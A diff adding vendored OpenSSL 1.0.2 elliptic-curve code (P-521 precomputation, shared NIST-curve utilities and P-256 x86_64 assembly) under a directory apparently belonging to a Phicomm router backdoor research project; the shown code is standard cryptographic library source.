+    for (i = 1; i <= 4; i <<= 1) {
+        point_double(pre->g_pre_comp[2 * i][0], pre->g_pre_comp[2 * i][1],
+                     pre->g_pre_comp[2 * i][2], pre->g_pre_comp[i][0],
+                     pre->g_pre_comp[i][1], pre->g_pre_comp[i][2]);
+        for (j = 0; j < 129; ++j) {
+            point_double(pre->g_pre_comp[2 * i][0],
+                         pre->g_pre_comp[2 * i][1],
+                         pre->g_pre_comp[2 * i][2],
+                         pre->g_pre_comp[2 * i][0],
+                         pre->g_pre_comp[2 * i][1],
+                         pre->g_pre_comp[2 * i][2]);
+        }
+    }
+    /* g_pre_comp[0] is the point at infinity */
+    memset(pre->g_pre_comp[0], 0, sizeof(pre->g_pre_comp[0]));
+    /* the remaining multiples */
+    /* 2^130*G + 2^260*G */
+    point_add(pre->g_pre_comp[6][0], pre->g_pre_comp[6][1],
+              pre->g_pre_comp[6][2], pre->g_pre_comp[4][0],
+              pre->g_pre_comp[4][1], pre->g_pre_comp[4][2],
+              0, pre->g_pre_comp[2][0], pre->g_pre_comp[2][1],
+              pre->g_pre_comp[2][2]);
+    /* 2^130*G + 2^390*G */
+    point_add(pre->g_pre_comp[10][0], pre->g_pre_comp[10][1],
+              pre->g_pre_comp[10][2], pre->g_pre_comp[8][0],
+              pre->g_pre_comp[8][1], pre->g_pre_comp[8][2],
+              0, pre->g_pre_comp[2][0], pre->g_pre_comp[2][1],
+              pre->g_pre_comp[2][2]);
+    /* 2^260*G + 2^390*G */
+    point_add(pre->g_pre_comp[12][0], pre->g_pre_comp[12][1],
+              pre->g_pre_comp[12][2], pre->g_pre_comp[8][0],
+              pre->g_pre_comp[8][1], pre->g_pre_comp[8][2],
+              0, pre->g_pre_comp[4][0], pre->g_pre_comp[4][1],
+              pre->g_pre_comp[4][2]);
+    /* 2^130*G + 2^260*G + 2^390*G */
+    point_add(pre->g_pre_comp[14][0], pre->g_pre_comp[14][1],
+              pre->g_pre_comp[14][2], pre->g_pre_comp[12][0],
+              pre->g_pre_comp[12][1], pre->g_pre_comp[12][2],
+              0, pre->g_pre_comp[2][0], pre->g_pre_comp[2][1],
+              pre->g_pre_comp[2][2]);
+    for (i = 1; i < 8; ++i) {
+        /* odd multiples: add G */
+        point_add(pre->g_pre_comp[2 * i + 1][0],
+                  pre->g_pre_comp[2 * i + 1][1],
+                  pre->g_pre_comp[2 * i + 1][2], pre->g_pre_comp[2 * i][0],
+                  pre->g_pre_comp[2 * i][1], pre->g_pre_comp[2 * i][2], 0,
+                  pre->g_pre_comp[1][0], pre->g_pre_comp[1][1],
+                  pre->g_pre_comp[1][2]);
+    }
+    make_points_affine(15, &(pre->g_pre_comp[1]), tmp_felems);
+
+    if (!EC_EX_DATA_set_data(&group->extra_data, pre, nistp521_pre_comp_dup,
+                             nistp521_pre_comp_free,
+                             nistp521_pre_comp_clear_free))
+        goto err;
+    ret = 1;
+    pre = NULL;
+ err:
+    BN_CTX_end(ctx);
+    if (generator != NULL)
+        EC_POINT_free(generator);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (pre)
+        nistp521_pre_comp_free(pre);
+    return ret;
+}
+
+int ec_GFp_nistp521_have_precompute_mult(const EC_GROUP *group)
+{
+    if (EC_EX_DATA_get_data(group->extra_data, nistp521_pre_comp_dup,
+                            nistp521_pre_comp_free,
+                            nistp521_pre_comp_clear_free)
+        != NULL)
+        return 1;
+    else
+        return 0;
+}
+
+#else
+static void *dummy = &dummy;
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistputil.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistputil.c
new file mode 100644
index 0000000..8ba2a25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistputil.c
@@ -0,0 +1,218 @@
+/* crypto/ec/ecp_nistputil.c */
+/*
+ * Written by Bodo Moeller for the OpenSSL project.
+ */
+/* Copyright 2011 Google Inc.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ *
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *  Unless required by applicable law or agreed to in writing, software
+ *  distributed under the License is distributed on an "AS IS" BASIS,
+ *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *  See the License for the specific language governing permissions and
+ *  limitations under the License.
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+
+/*
+ * Common utility functions for ecp_nistp224.c, ecp_nistp256.c, ecp_nistp521.c.
+ */
+
+# include <stddef.h>
+# include "ec_lcl.h"
+
+/*
+ * Convert an array of points into affine coordinates. (If the point at
+ * infinity is found (Z = 0), it remains unchanged.) This function is
+ * essentially an equivalent to EC_POINTs_make_affine(), but works with the
+ * internal representation of points as used by ecp_nistp###.c rather than
+ * with (BIGNUM-based) EC_POINT data structures. point_array is the
+ * input/output buffer ('num' points in projective form, i.e. three
+ * coordinates each), based on an internal representation of field elements
+ * of size 'felem_size'. tmp_felems needs to point to a temporary array of
+ * 'num'+1 field elements for storage of intermediate values.
+ */
+void ec_GFp_nistp_points_make_affine_internal(size_t num, void *point_array,
+                                              size_t felem_size,
+                                              void *tmp_felems,
+                                              void (*felem_one) (void *out),
+                                              int (*felem_is_zero) (const void
+                                                                    *in),
+                                              void (*felem_assign) (void *out,
+                                                                    const void
+                                                                    *in),
+                                              void (*felem_square) (void *out,
+                                                                    const void
+                                                                    *in),
+                                              void (*felem_mul) (void *out,
+                                                                 const void
+                                                                 *in1,
+                                                                 const void
+                                                                 *in2),
+                                              void (*felem_inv) (void *out,
+                                                                 const void
+                                                                 *in),
+                                              void (*felem_contract) (void
+                                                                      *out,
+                                                                      const
+                                                                      void
+                                                                      *in))
+{
+    int i = 0;
+
+# define tmp_felem(I) (&((char *)tmp_felems)[(I) * felem_size])
+# define X(I) (&((char *)point_array)[3*(I) * felem_size])
+# define Y(I) (&((char *)point_array)[(3*(I) + 1) * felem_size])
+# define Z(I) (&((char *)point_array)[(3*(I) + 2) * felem_size])
+
+    if (!felem_is_zero(Z(0)))
+        felem_assign(tmp_felem(0), Z(0));
+    else
+        felem_one(tmp_felem(0));
+    for (i = 1; i < (int)num; i++) {
+        if (!felem_is_zero(Z(i)))
+            felem_mul(tmp_felem(i), tmp_felem(i - 1), Z(i));
+        else
+            felem_assign(tmp_felem(i), tmp_felem(i - 1));
+    }
+    /*
+     * Now each tmp_felem(i) is the product of Z(0) .. Z(i), skipping any
+     * zero-valued factors: if Z(i) = 0, we essentially pretend that Z(i) = 1
+     */
+
+    felem_inv(tmp_felem(num - 1), tmp_felem(num - 1));
+    for (i = num - 1; i >= 0; i--) {
+        if (i > 0)
+            /*
+             * tmp_felem(i-1) is the product of Z(0) .. Z(i-1), tmp_felem(i)
+             * is the inverse of the product of Z(0) .. Z(i)
+             */
+            /* 1/Z(i) */
+            felem_mul(tmp_felem(num), tmp_felem(i - 1), tmp_felem(i));
+        else
+            felem_assign(tmp_felem(num), tmp_felem(0)); /* 1/Z(0) */
+
+        if (!felem_is_zero(Z(i))) {
+            if (i > 0)
+                /*
+                 * For next iteration, replace tmp_felem(i-1) by its inverse
+                 */
+                felem_mul(tmp_felem(i - 1), tmp_felem(i), Z(i));
+
+            /*
+             * Convert point (X, Y, Z) into affine form (X/(Z^2), Y/(Z^3), 1)
+             */
+            felem_square(Z(i), tmp_felem(num)); /* 1/(Z^2) */
+            felem_mul(X(i), X(i), Z(i)); /* X/(Z^2) */
+            felem_mul(Z(i), Z(i), tmp_felem(num)); /* 1/(Z^3) */
+            felem_mul(Y(i), Y(i), Z(i)); /* Y/(Z^3) */
+            felem_contract(X(i), X(i));
+            felem_contract(Y(i), Y(i));
+            felem_one(Z(i));
+        } else {
+            if (i > 0)
+                /*
+                 * For next iteration, replace tmp_felem(i-1) by its inverse
+                 */
+                felem_assign(tmp_felem(i - 1), tmp_felem(i));
+        }
+    }
+}
+
+/*-
+ * This function looks at 5+1 scalar bits (5 current, 1 adjacent less
+ * significant bit), and recodes them into a signed digit for use in fast point
+ * multiplication: the use of signed rather than unsigned digits means that
+ * fewer points need to be precomputed, given that point inversion is easy
+ * (a precomputed point dP makes -dP available as well).
+ *
+ * BACKGROUND:
+ *
+ * Signed digits for multiplication were introduced by Booth ("A signed binary
+ * multiplication technique", Quart. Journ. Mech. and Applied Math., vol. IV,
+ * pt. 2 (1951), pp. 236-240), in that case for multiplication of integers.
+ * Booth's original encoding did not generally improve the density of nonzero
+ * digits over the binary representation, and was merely meant to simplify the
+ * handling of signed factors given in two's complement; but it has since been
+ * shown to be the basis of various signed-digit representations that do have
+ * further advantages, including the wNAF, using the following general approach:
+ *
+ * (1) Given a binary representation
+ *
+ *       b_k  ...  b_2  b_1  b_0,
+ *
+ *     of a nonnegative integer (b_k in {0, 1}), rewrite it in digits 0, 1, -1
+ *     by using bit-wise subtraction as follows:
+ *
+ *        b_k b_(k-1)  ...  b_2  b_1  b_0
+ *      -     b_k      ...  b_3  b_2  b_1  b_0
+ *       -------------------------------------
+ *        s_k b_(k-1)  ...  s_3  s_2  s_1  s_0
+ *
+ *     A left-shift followed by subtraction of the original value yields a new
+ *     representation of the same value, using signed bits s_i = b_(i+1) - b_i.
+ *     This representation from Booth's paper has since appeared in the
+ *     literature under a variety of different names including "reversed binary
+ *     form", "alternating greedy expansion", "mutual opposite form", and
+ *     "sign-alternating {+-1}-representation".
+ *
+ *     An interesting property is that among the nonzero bits, values 1 and -1
+ *     strictly alternate.
+ *
+ * (2) Various window schemes can be applied to the Booth representation of
+ *     integers: for example, right-to-left sliding windows yield the wNAF
+ *     (a signed-digit encoding independently discovered by various researchers
+ *     in the 1990s), and left-to-right sliding windows yield a left-to-right
+ *     equivalent of the wNAF (independently discovered by various researchers
+ *     around 2004).
+ *
+ * To prevent leaking information through side channels in point multiplication,
+ * we need to recode the given integer into a regular pattern: sliding windows
+ * as in wNAFs won't do, we need their fixed-window equivalent -- which is a few
+ * decades older: we'll be using the so-called "modified Booth encoding" due to
+ * MacSorley ("High-speed arithmetic in binary computers", Proc. IRE, vol. 49
+ * (1961), pp. 67-91), in a radix-2^5 setting.  That is, we always combine five
+ * signed bits into a signed digit:
+ *
+ *       s_(4j + 4) s_(4j + 3) s_(4j + 2) s_(4j + 1) s_(4j)
+ *
+ * The sign-alternating property implies that the resulting digit values are
+ * integers from -16 to 16.
+ *
+ * Of course, we don't actually need to compute the signed digits s_i as an
+ * intermediate step (that's just a nice way to see how this scheme relates
+ * to the wNAF): a direct computation obtains the recoded digit from the
+ * six bits b_(4j + 4) ... b_(4j - 1).
+ *
+ * This function takes those five bits as an integer (0 .. 63), writing the
+ * recoded digit to *sign (0 for positive, 1 for negative) and *digit (absolute
+ * value, in the range 0 .. 8).  Note that this integer essentially provides the
+ * input bits "shifted to the left" by one position: for example, the input to
+ * compute the least significant recoded digit, given that there's no bit b_-1,
+ * has to be b_4 b_3 b_2 b_1 b_0 0.
+ *
+ */
+void ec_GFp_nistp_recode_scalar_bits(unsigned char *sign,
+                                     unsigned char *digit, unsigned char in)
+{
+    unsigned char s, d;
+
+    s = ~((in >> 5) - 1);       /* sets all bits to MSB(in), 'in' seen as
+                                 * 6-bit value */
+    d = (1 << 6) - in - 1;
+    d = (d & s) | (in & ~s);
+    d = (d >> 1) + (d & 1);
+
+    *sign = s & 1;
+    *digit = d;
+}
+#else
+static void *dummy = &dummy;
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256-x86_64.s b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256-x86_64.s
new file mode 100644
index 0000000..bb3cd14
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256-x86_64.s
@@ -0,0 +1,3504 @@
+.text	
+
+
+
+.align	64
+.Lpoly:
+.quad	0xffffffffffffffff, 0x00000000ffffffff, 0x0000000000000000, 0xffffffff00000001
+
+
+.LRR:
+.quad	0x0000000000000003, 0xfffffffbffffffff, 0xfffffffffffffffe, 0x00000004fffffffd
+
+.LOne:
+.long	1,1,1,1,1,1,1,1
+.LTwo:
+.long	2,2,2,2,2,2,2,2
+.LThree:
+.long	3,3,3,3,3,3,3,3
+.LONE_mont:
+.quad	0x0000000000000001, 0xffffffff00000000, 0xffffffffffffffff, 0x00000000fffffffe
+
+.globl	ecp_nistz256_mul_by_2
+.type	ecp_nistz256_mul_by_2,@function
+.align	64
+ecp_nistz256_mul_by_2:
+	pushq	%r12
+	pushq	%r13
+
+	movq	0(%rsi),%r8
+	movq	8(%rsi),%r9
+	addq	%r8,%r8
+	movq	16(%rsi),%r10
+	adcq	%r9,%r9
+	movq	24(%rsi),%r11
+	leaq	.Lpoly(%rip),%rsi
+	movq	%r8,%rax
+	adcq	%r10,%r10
+	adcq	%r11,%r11
+	movq	%r9,%rdx
+	sbbq	%r13,%r13
+
+	subq	0(%rsi),%r8
+	movq	%r10,%rcx
+	sbbq	8(%rsi),%r9
+	sbbq	16(%rsi),%r10
+	movq	%r11,%r12
+	sbbq	24(%rsi),%r11
+	testq	%r13,%r13
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	movq	%r8,0(%rdi)
+	cmovzq	%rcx,%r10
+	movq	%r9,8(%rdi)
+	cmovzq	%r12,%r11
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_mul_by_2,.-ecp_nistz256_mul_by_2
+
+
+
+.globl	ecp_nistz256_div_by_2
+.type	ecp_nistz256_div_by_2,@function
+.align	32
+ecp_nistz256_div_by_2:
+	pushq	%r12
+	pushq	%r13
+
+	movq	0(%rsi),%r8
+	movq	8(%rsi),%r9
+	movq	16(%rsi),%r10
+	movq	%r8,%rax
+	movq	24(%rsi),%r11
+	leaq	.Lpoly(%rip),%rsi
+
+	movq	%r9,%rdx
+	xorq	%r13,%r13
+	addq	0(%rsi),%r8
+	movq	%r10,%rcx
+	adcq	8(%rsi),%r9
+	adcq	16(%rsi),%r10
+	movq	%r11,%r12
+	adcq	24(%rsi),%r11
+	adcq	$0,%r13
+	xorq	%rsi,%rsi
+	testq	$1,%rax
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	cmovzq	%rcx,%r10
+	cmovzq	%r12,%r11
+	cmovzq	%rsi,%r13
+
+	movq	%r9,%rax
+	shrq	$1,%r8
+	shlq	$63,%rax
+	movq	%r10,%rdx
+	shrq	$1,%r9
+	orq	%rax,%r8
+	shlq	$63,%rdx
+	movq	%r11,%rcx
+	shrq	$1,%r10
+	orq	%rdx,%r9
+	shlq	$63,%rcx
+	shrq	$1,%r11
+	shlq	$63,%r13
+	orq	%rcx,%r10
+	orq	%r13,%r11
+
+	movq	%r8,0(%rdi)
+	movq	%r9,8(%rdi)
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_div_by_2,.-ecp_nistz256_div_by_2
+
+
+
+.globl	ecp_nistz256_mul_by_3
+.type	ecp_nistz256_mul_by_3,@function
+.align	32
+ecp_nistz256_mul_by_3:
+	pushq	%r12
+	pushq	%r13
+
+	movq	0(%rsi),%r8
+	xorq	%r13,%r13
+	movq	8(%rsi),%r9
+	addq	%r8,%r8
+	movq	16(%rsi),%r10
+	adcq	%r9,%r9
+	movq	24(%rsi),%r11
+	movq	%r8,%rax
+	adcq	%r10,%r10
+	adcq	%r11,%r11
+	movq	%r9,%rdx
+	adcq	$0,%r13
+
+	subq	$-1,%r8
+	movq	%r10,%rcx
+	sbbq	.Lpoly+8(%rip),%r9
+	sbbq	$0,%r10
+	movq	%r11,%r12
+	sbbq	.Lpoly+24(%rip),%r11
+	testq	%r13,%r13
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	cmovzq	%rcx,%r10
+	cmovzq	%r12,%r11
+
+	xorq	%r13,%r13
+	addq	0(%rsi),%r8
+	adcq	8(%rsi),%r9
+	movq	%r8,%rax
+	adcq	16(%rsi),%r10
+	adcq	24(%rsi),%r11
+	movq	%r9,%rdx
+	adcq	$0,%r13
+
+	subq	$-1,%r8
+	movq	%r10,%rcx
+	sbbq	.Lpoly+8(%rip),%r9
+	sbbq	$0,%r10
+	movq	%r11,%r12
+	sbbq	.Lpoly+24(%rip),%r11
+	testq	%r13,%r13
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	movq	%r8,0(%rdi)
+	cmovzq	%rcx,%r10
+	movq	%r9,8(%rdi)
+	cmovzq	%r12,%r11
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_mul_by_3,.-ecp_nistz256_mul_by_3
+
+
+
+.globl	ecp_nistz256_add
+.type	ecp_nistz256_add,@function
+.align	32
+ecp_nistz256_add:
+	pushq	%r12
+	pushq	%r13
+
+	movq	0(%rsi),%r8
+	xorq	%r13,%r13
+	movq	8(%rsi),%r9
+	movq	16(%rsi),%r10
+	movq	24(%rsi),%r11
+	leaq	.Lpoly(%rip),%rsi
+
+	addq	0(%rdx),%r8
+	adcq	8(%rdx),%r9
+	movq	%r8,%rax
+	adcq	16(%rdx),%r10
+	adcq	24(%rdx),%r11
+	movq	%r9,%rdx
+	adcq	$0,%r13
+
+	subq	0(%rsi),%r8
+	movq	%r10,%rcx
+	sbbq	8(%rsi),%r9
+	sbbq	16(%rsi),%r10
+	movq	%r11,%r12
+	sbbq	24(%rsi),%r11
+	testq	%r13,%r13
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	movq	%r8,0(%rdi)
+	cmovzq	%rcx,%r10
+	movq	%r9,8(%rdi)
+	cmovzq	%r12,%r11
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_add,.-ecp_nistz256_add
+
+
+
+.globl	ecp_nistz256_sub
+.type	ecp_nistz256_sub,@function
+.align	32
+ecp_nistz256_sub:
+	pushq	%r12
+	pushq	%r13
+
+	movq	0(%rsi),%r8
+	xorq	%r13,%r13
+	movq	8(%rsi),%r9
+	movq	16(%rsi),%r10
+	movq	24(%rsi),%r11
+	leaq	.Lpoly(%rip),%rsi
+
+	subq	0(%rdx),%r8
+	sbbq	8(%rdx),%r9
+	movq	%r8,%rax
+	sbbq	16(%rdx),%r10
+	sbbq	24(%rdx),%r11
+	movq	%r9,%rdx
+	sbbq	$0,%r13
+
+	addq	0(%rsi),%r8
+	movq	%r10,%rcx
+	adcq	8(%rsi),%r9
+	adcq	16(%rsi),%r10
+	movq	%r11,%r12
+	adcq	24(%rsi),%r11
+	testq	%r13,%r13
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	movq	%r8,0(%rdi)
+	cmovzq	%rcx,%r10
+	movq	%r9,8(%rdi)
+	cmovzq	%r12,%r11
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_sub,.-ecp_nistz256_sub
+
+
+
+.globl	ecp_nistz256_neg
+.type	ecp_nistz256_neg,@function
+.align	32
+ecp_nistz256_neg:
+	pushq	%r12
+	pushq	%r13
+
+	xorq	%r8,%r8
+	xorq	%r9,%r9
+	xorq	%r10,%r10
+	xorq	%r11,%r11
+	xorq	%r13,%r13
+
+	subq	0(%rsi),%r8
+	sbbq	8(%rsi),%r9
+	sbbq	16(%rsi),%r10
+	movq	%r8,%rax
+	sbbq	24(%rsi),%r11
+	leaq	.Lpoly(%rip),%rsi
+	movq	%r9,%rdx
+	sbbq	$0,%r13
+
+	addq	0(%rsi),%r8
+	movq	%r10,%rcx
+	adcq	8(%rsi),%r9
+	adcq	16(%rsi),%r10
+	movq	%r11,%r12
+	adcq	24(%rsi),%r11
+	testq	%r13,%r13
+
+	cmovzq	%rax,%r8
+	cmovzq	%rdx,%r9
+	movq	%r8,0(%rdi)
+	cmovzq	%rcx,%r10
+	movq	%r9,8(%rdi)
+	cmovzq	%r12,%r11
+	movq	%r10,16(%rdi)
+	movq	%r11,24(%rdi)
+
+	popq	%r13
+	popq	%r12
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_neg,.-ecp_nistz256_neg
+
+
+
+
+.globl	ecp_nistz256_to_mont
+.type	ecp_nistz256_to_mont,@function
+.align	32
+ecp_nistz256_to_mont:
+	movl	$524544,%ecx
+	andl	OPENSSL_ia32cap_P+8(%rip),%ecx
+	leaq	.LRR(%rip),%rdx
+	jmp	.Lmul_mont
+.size	ecp_nistz256_to_mont,.-ecp_nistz256_to_mont
+
+
+
+
+
+
+
+.globl	ecp_nistz256_mul_mont
+.type	ecp_nistz256_mul_mont,@function
+.align	32
+ecp_nistz256_mul_mont:
+	movl	$524544,%ecx
+	andl	OPENSSL_ia32cap_P+8(%rip),%ecx
+.Lmul_mont:
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	cmpl	$524544,%ecx
+	je	.Lmul_montx
+	movq	%rdx,%rbx
+	movq	0(%rdx),%rax
+	movq	0(%rsi),%r9
+	movq	8(%rsi),%r10
+	movq	16(%rsi),%r11
+	movq	24(%rsi),%r12
+
+	call	__ecp_nistz256_mul_montq
+	jmp	.Lmul_mont_done
+
+.align	32
+.Lmul_montx:
+	movq	%rdx,%rbx
+	movq	0(%rdx),%rdx
+	movq	0(%rsi),%r9
+	movq	8(%rsi),%r10
+	movq	16(%rsi),%r11
+	movq	24(%rsi),%r12
+	leaq	-128(%rsi),%rsi
+
+	call	__ecp_nistz256_mul_montx
+.Lmul_mont_done:
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_mul_mont,.-ecp_nistz256_mul_mont
+
+.type	__ecp_nistz256_mul_montq,@function
+.align	32
+__ecp_nistz256_mul_montq:
+
+
+	movq	%rax,%rbp
+	mulq	%r9
+	movq	.Lpoly+8(%rip),%r14
+	movq	%rax,%r8
+	movq	%rbp,%rax
+	movq	%rdx,%r9
+
+	mulq	%r10
+	movq	.Lpoly+24(%rip),%r15
+	addq	%rax,%r9
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%r10
+
+	mulq	%r11
+	addq	%rax,%r10
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%r11
+
+	mulq	%r12
+	addq	%rax,%r11
+	movq	%r8,%rax
+	adcq	$0,%rdx
+	xorq	%r13,%r13
+	movq	%rdx,%r12
+
+
+
+
+
+
+
+
+
+
+	movq	%r8,%rbp
+	shlq	$32,%r8
+	mulq	%r15
+	shrq	$32,%rbp
+	addq	%r8,%r9
+	adcq	%rbp,%r10
+	adcq	%rax,%r11
+	movq	8(%rbx),%rax
+	adcq	%rdx,%r12
+	adcq	$0,%r13
+	xorq	%r8,%r8
+
+
+
+	movq	%rax,%rbp
+	mulq	0(%rsi)
+	addq	%rax,%r9
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	8(%rsi)
+	addq	%rcx,%r10
+	adcq	$0,%rdx
+	addq	%rax,%r10
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	16(%rsi)
+	addq	%rcx,%r11
+	adcq	$0,%rdx
+	addq	%rax,%r11
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	24(%rsi)
+	addq	%rcx,%r12
+	adcq	$0,%rdx
+	addq	%rax,%r12
+	movq	%r9,%rax
+	adcq	%rdx,%r13
+	adcq	$0,%r8
+
+
+
+	movq	%r9,%rbp
+	shlq	$32,%r9
+	mulq	%r15
+	shrq	$32,%rbp
+	addq	%r9,%r10
+	adcq	%rbp,%r11
+	adcq	%rax,%r12
+	movq	16(%rbx),%rax
+	adcq	%rdx,%r13
+	adcq	$0,%r8
+	xorq	%r9,%r9
+
+
+
+	movq	%rax,%rbp
+	mulq	0(%rsi)
+	addq	%rax,%r10
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	8(%rsi)
+	addq	%rcx,%r11
+	adcq	$0,%rdx
+	addq	%rax,%r11
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	16(%rsi)
+	addq	%rcx,%r12
+	adcq	$0,%rdx
+	addq	%rax,%r12
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	24(%rsi)
+	addq	%rcx,%r13
+	adcq	$0,%rdx
+	addq	%rax,%r13
+	movq	%r10,%rax
+	adcq	%rdx,%r8
+	adcq	$0,%r9
+
+
+
+	movq	%r10,%rbp
+	shlq	$32,%r10
+	mulq	%r15
+	shrq	$32,%rbp
+	addq	%r10,%r11
+	adcq	%rbp,%r12
+	adcq	%rax,%r13
+	movq	24(%rbx),%rax
+	adcq	%rdx,%r8
+	adcq	$0,%r9
+	xorq	%r10,%r10
+
+
+
+	movq	%rax,%rbp
+	mulq	0(%rsi)
+	addq	%rax,%r11
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	8(%rsi)
+	addq	%rcx,%r12
+	adcq	$0,%rdx
+	addq	%rax,%r12
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	16(%rsi)
+	addq	%rcx,%r13
+	adcq	$0,%rdx
+	addq	%rax,%r13
+	movq	%rbp,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rcx
+
+	mulq	24(%rsi)
+	addq	%rcx,%r8
+	adcq	$0,%rdx
+	addq	%rax,%r8
+	movq	%r11,%rax
+	adcq	%rdx,%r9
+	adcq	$0,%r10
+
+
+
+	movq	%r11,%rbp
+	shlq	$32,%r11
+	mulq	%r15
+	shrq	$32,%rbp
+	addq	%r11,%r12
+	adcq	%rbp,%r13
+	movq	%r12,%rcx
+	adcq	%rax,%r8
+	adcq	%rdx,%r9
+	movq	%r13,%rbp
+	adcq	$0,%r10
+
+
+
+	subq	$-1,%r12
+	movq	%r8,%rbx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%rdx
+	sbbq	%r15,%r9
+	sbbq	$0,%r10
+
+	cmovcq	%rcx,%r12
+	cmovcq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovcq	%rbx,%r8
+	movq	%r13,8(%rdi)
+	cmovcq	%rdx,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_mul_montq,.-__ecp_nistz256_mul_montq
+
+
+
+
+
+
+
+
+.globl	ecp_nistz256_sqr_mont
+.type	ecp_nistz256_sqr_mont,@function
+.align	32
+ecp_nistz256_sqr_mont:
+	movl	$524544,%ecx
+	andl	OPENSSL_ia32cap_P+8(%rip),%ecx
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	cmpl	$524544,%ecx
+	je	.Lsqr_montx
+	movq	0(%rsi),%rax
+	movq	8(%rsi),%r14
+	movq	16(%rsi),%r15
+	movq	24(%rsi),%r8
+
+	call	__ecp_nistz256_sqr_montq
+	jmp	.Lsqr_mont_done
+
+.align	32
+.Lsqr_montx:
+	movq	0(%rsi),%rdx
+	movq	8(%rsi),%r14
+	movq	16(%rsi),%r15
+	movq	24(%rsi),%r8
+	leaq	-128(%rsi),%rsi
+
+	call	__ecp_nistz256_sqr_montx
+.Lsqr_mont_done:
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_sqr_mont,.-ecp_nistz256_sqr_mont
+
+.type	__ecp_nistz256_sqr_montq,@function
+.align	32
+__ecp_nistz256_sqr_montq:
+	movq	%rax,%r13
+	mulq	%r14
+	movq	%rax,%r9
+	movq	%r15,%rax
+	movq	%rdx,%r10
+
+	mulq	%r13
+	addq	%rax,%r10
+	movq	%r8,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%r11
+
+	mulq	%r13
+	addq	%rax,%r11
+	movq	%r15,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%r12
+
+
+	mulq	%r14
+	addq	%rax,%r11
+	movq	%r8,%rax
+	adcq	$0,%rdx
+	movq	%rdx,%rbp
+
+	mulq	%r14
+	addq	%rax,%r12
+	movq	%r8,%rax
+	adcq	$0,%rdx
+	addq	%rbp,%r12
+	movq	%rdx,%r13
+	adcq	$0,%r13
+
+
+	mulq	%r15
+	xorq	%r15,%r15
+	addq	%rax,%r13
+	movq	0(%rsi),%rax
+	movq	%rdx,%r14
+	adcq	$0,%r14
+
+	addq	%r9,%r9
+	adcq	%r10,%r10
+	adcq	%r11,%r11
+	adcq	%r12,%r12
+	adcq	%r13,%r13
+	adcq	%r14,%r14
+	adcq	$0,%r15
+
+	mulq	%rax
+	movq	%rax,%r8
+	movq	8(%rsi),%rax
+	movq	%rdx,%rcx
+
